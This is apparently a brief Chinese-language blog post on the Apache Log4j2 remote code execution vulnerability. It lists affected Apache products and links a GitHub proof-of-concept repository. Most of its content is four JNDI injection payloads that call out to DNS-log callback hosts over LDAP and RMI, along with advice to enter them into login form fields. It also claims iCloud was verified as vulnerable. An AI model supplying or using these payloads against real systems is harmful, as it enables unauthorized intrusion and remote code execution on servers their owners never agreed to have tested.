ApacheLog4j2远程代码执行漏洞

发表于 更新于 分类于 阅读次数:

影响范围

攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响

github地址:

https://github.com/tangxiaofeng7/apache-log4j-poc

POC

网传POC:

在登录口用户名密码都登录打一下就知道了

${jndi:ldap://xxxxx.dnslog.cn/exp}

${jndi:rmi://xxxxx.dnslog.cn/exp}

${jndi:ldap://exp.ajvkiz.ceye.io/exp}

${jndi:rmi://exp.ajvkiz.ceye.io/exp}

经验证Icloud存在此洞,中国是UTC+8时区:

截图

截图